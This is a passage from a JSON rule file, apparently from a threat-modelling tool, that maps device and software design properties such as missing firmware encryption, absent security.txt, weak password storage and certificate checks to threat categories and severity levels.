backup","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f51350c5-5401-4276-a8e5-14eba86bc070","Name":"Log files contain passwords","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e145ffad-ec47-4251-9fa4-1475133db2ff","Name":"Missing log entry","Description":"Missing security-relevant information for audits: login attempts, changes in user session, firmware updates, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a154298a-d410-4da4-921d-906165cd5329","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"91abf825-cfca-4386-b5d5-8262423b090d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"cf4a11cf-4dee-46ef-8c68-48b5dced2de0","Name":"Missing reporting system","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","Name":"Non-disclosure","Description":"There are mainly coordinated vulnerability disclosure and non-disclosure. Coordinated vulnerability is important for independent security researchers to get reputation. Non-disclosure could possible lead to public reports without fixed vulnerabilities.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","Name":"Missing bug bounty program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"370351b8-cef2-43bf-89f2-324a814e00a3","Name":"Missing /security page","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36e1de4b-5129-470f-b06d-208ef7610da8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"df78de64-d35e-474f-be3b-260f60a13fc6","Name":"Missing security.txt","Description":"https://securitytxt.org/\\nhttps://en.wikipedia.org/wiki/Security.txt","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3affc4da-9a78-43ec-990b-75d20edbc410","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ebf9833c-733d-4356-b390-e754096d0da8","Name":"Missing contact email address","Description":"E.g. security-alert, security, psirt, csirt@companydomain.com","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"543e017c-8bc2-444e-a3fb-d1dbd52ae21b","Name":"Missing public policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"a68571c4-61b7-4a33-b5d9-104ef2c06ed0","Name":"Missing PGP key","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","Name":"Missing timeline info","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"96661040-05b5-436b-887a-f7864419d691","Name":"Missing Firmware Encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"434d79b2-574c-4575-813b-19ec7854a139","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"96208355-0119-41f4-9b93-b0a5781e9ae1","Name":"Unnecessary components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dfc187d5-8287-4c8e-99bc-09cc3e26e201","Name":"Outdated OS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4ba05121-485a-40eb-832a-f4095c7b88df","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"49344c1a-2368-4a01-a366-023707d0b354","Name":"Secure configuration not default","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b640f7fb-fb76-4de9-bcf2-0883807f58da","Name":"Missing component update process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"efd73610-90fd-406a-9139-82ff0552bc43","Name":"Activated services and ports","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8886f368-618b-4520-a7f5-1db3141da66b","Name":"Improper permission configuration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"16f2c70d-1752-4e7a-b1ac-5f95710c2778","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7378780b-e280-4494-84f2-0beb4e7257ec","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"019f2476-ceca-47ab-b19e-9c2077cc35fe","Name":"Missing file system encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"85e19877-51a0-4904-8e98-b2fb14be3922","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"5d407978-73dc-45c9-8402-db692b42dae4","Name":"Improper boot order","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"10a258f6-49c0-435e-9a66-630039de0dc8","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61e37274-9751-4250-8a4d-6476edc8f732","Name":"Boot Code Protection in RAM","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"568a6a24-9109-4f93-b3b3-d3754260387e","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5d59dab8-ca08-4359-8e7d-284dcde6d4b7","Name":"Missing application isolation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"de96008b-1c59-4319-9b5c-4f5a7e97a122","Name":"Improper input validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"337c4826-08ed-4c40-9542-54f08317ddb0","Name":"Keys not stored in security module","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","Name":"Key usage in untrusted environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1267c02f-4adf-4086-9a9b-c5cc0f81c709","Name":"Missing key encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a529a0c3-a98e-41be-80f5-84b876ddddc6","Name":"Missing tamper resistant unique ID","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b41315d4-f62d-4133-9a38-be8097a66ebb","Name":"Missing unique user identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"50864039-1856-432a-9ff2-0acf3cccd644","Name":"Missing privilege differentiation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cdb65d33-946e-412e-838b-3075e928c4f0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","Name":"Improper password storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","Name":"Missing certificate chain verification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"20b12b0e-4031-4eb3-ad39-f91489884490","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"8bab4292-bca9-4701-8141-a62fc2b2cded","Name":"Certificate expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab8ff926-1147-4597-bded-42fbfb71edb2","Name":"Revoked certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ed84da5f-3181-4be1-bef4-d911077b1910","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"135275c4-5523-4a95-a466-47947930377a","Name":"Uncleared user data","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"dbf5eca4-f98b-443d-b9a1-8113fafc962e","Name":"Password sharing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ffd6083b-7183-472c-b250-15b0de223735","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"85519ed2-313e-4c85-85fd-f89109f845d4","Name":"Unhandled exceptions","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e36eff83-1863-4026-bffe-966a9a104331","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"871318c9-4e0c-4ff4-a475-06195ea4e3bb","Name":"Sensitive (error) information exposed ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7733c50-2529-459f-9397-8d06f231121c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"bf9e6225-fb28-429a-84f1-fe3be63c3d95","Name":"Sensitive (authentication) information exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e2529607-c1fd-472d-ad14-c7f2cc719282","Name":"Booting manipulated firmware","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"a3c2f053-c8d6-4626-ae54-79f87ae171c3","Name":"Hardware manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[]},"Severity":1},{"ID":"221071ed-1d87-43cc-8052-b615e6ebef04","Name":"Key disclosure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"6b4eb6d6-a03f-4678-a033-924bd5526f13","Name":"Spoofing the sender process","Description":"The sender process may be spoofed by an attacker and this may lead to unauthorized access to the receiver process. Consider using a standard authentication mechanism to identify the source 